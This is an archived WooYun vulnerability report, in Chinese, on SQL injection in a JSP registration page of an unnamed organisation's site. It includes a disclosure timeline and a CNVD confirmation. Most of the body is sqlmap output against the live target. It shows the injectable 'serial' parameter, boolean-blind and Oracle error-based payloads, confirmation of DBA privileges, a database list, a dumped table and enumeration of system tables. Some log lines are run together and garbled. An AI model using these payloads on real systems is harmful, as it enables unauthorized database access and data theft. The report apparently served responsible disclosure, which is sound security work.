乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-24: 细节已通知厂商并且等待厂商处理中 2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-09: 细节向核心白帽子及相关领域专家公开 2015-10-19: 细节向普通白帽子公开 2015-10-29: 细节向实习白帽子公开 2015-11-13: 细节向公众公开
rt
注入点
http://**.**.**.**/STRCWeb/index.jsp?module=RegCenter&id=show&serial=EF3E7A6B-41B5-4CF0-95D1-B1B493726EA6&chuan=1
数据
Place: GETParameter: serial Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: module=RegCenter&id=show&serial=EF3E7A6B-41B5-4CF0-95D1-B1B4936' AND 1219=1219 AND 'FIXO'='FIXO&chuan=1 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: module=RegCenter&id=show&serial=EF3E7A6B-41B5-4CF0-95D1-B1B4936' AND 5888=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(122)||CHR(107)||CHR||CHR(58)||(SELECT (CASE WHEN (5888=5888) THEN 1 ELSE 0 END) FROM DUAL)||CH||CHR(114)||CHR(104)||CHR(108)||CHR(58)||CHR(62))) FROM DUAL) AND 'LTvf'='Lhuan=1---[14:41:52] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[14:41:52] [INFO] fetching current user[14:41:52] [INFO] resumed: STRCWEBcurrent user: 'STRCWEB'
web application technology: JSPback-end DBMS: Oracle[14:41:35] [INFO] testing if current user is DBA[14:41:35] [INFO] resumed: 1current user is DBA: 'True'
available databases [25[*] CTXSYS[*] HR[*] MDSYS[*] ODM[*] ODM_MTR[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] QS[*] QS_CBADM[*] QS_CS[*] QS_ES[*] QS_OS[*] QS_WS[*] RMAN[*] SCOTT[*] SH[*] STRCWEB[*] SYS[*] SYSTEM[*] WKSYS[*] WMSYS[*] XDB
+------------+---------------------------------+------------+------------+| JOB_ID | JOB_TITLE | MAX_SALARY | MIN_SALARY |+------------+---------------------------------+------------+------------+| AD_PRES | President | 40000 | 20000 || AD_VP | Administration Vice President | 30000 | 15000 || AD_ASST | Administration Assistant | 6000 | 3000 || FI_MGR | Finance Manager | 16000 | 8200 || FI_ACCOUNT | Accountant | 9000 | 4200 || AC_MGR | Accounting Manager | 16000 | 8200 || AC_ACCOUNT | Public Accountant | 9000 | 4200 || SA_MAN | Sales Manager | 20000 | 10000 || SA_REP | Sales Representative | 12000 | 6000 || PU_MAN | Purchasing Manager | 15000 | 8000 || PU_CLERK | Purchasing Clerk | 5500 | 2500 || ST_MAN | Stock Manager | 8500 | 5500 || ST_CLERK | Stock Clerk | 5000 | 2000 || SH_CLERK | Shipping Clerk | 5500 | 2500 || IT_PROG | Programmer | 10000 | 4000 || MK_MAN | Marketing Manager | 15000 | 9000 || MK_REP | Marketing Representative | 9000 | 4000 || HR_REP | Human Resources Representative | 9000 | 4000 || PR_REP | Public Relations Representative | 10500 | 4500 |+------------+---------------------------------+------------+------------+
861个表
[14:43:05] [INFO] the SQL query used returns 861 entries[14:43:06] [INFO] retrieved: SYS[14:43:08] [INFO] retrieved: SEG$[14:43:09] [INFO] retrieved: SYS[14:43:11] [INFO] retrieved: CLU$[14:43:13] [INFO] retrieved: SYS[14:43:14] [INFO] retrieved: OBJ$[14:43:15] [INFO] retrieved: SYS[14:43:24] [INFO] retrieved: FILE$[14:43:25] [INFO] retrieved: SYS[14:43:26] [INFO] retrieved: COL$[14:43:27] [INFO] retrieved: SYS[14:43:29] [INFO] retrieved: CON$[14:43:30] [INFO] retrieved: SYS[14:43:31] [INFO] retrieved: PROXY_DATA$[14:43:33] [INFO] retrieved: SYS[14:43:34] [INFO] retrieved: USER$[14:43:36] [INFO] retrieved: SYS[14:43:37] [INFO] retrieved: IND$[14:43:39] [INFO] retrieved: SYS[14:43:40] [INFO] retrieved: FET$[14:43:42] [INFO] retrieved: SYS[14:43:43] [INFO] retrieved: PROXY_ROLE_DATA$[14:43:44] [INFO] retrieved: SYS[14:43:46] [INFO] retrieved: UNDO$[14:43:47] [INFO] retrieved: SYS[14:43:49] [INFO] retrieved: UET$[14:43:50] [INFO] retrieved: SYS........................................................
危害等级:中
漏洞Rank:10
确认时间:2015-09-29 09:29
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无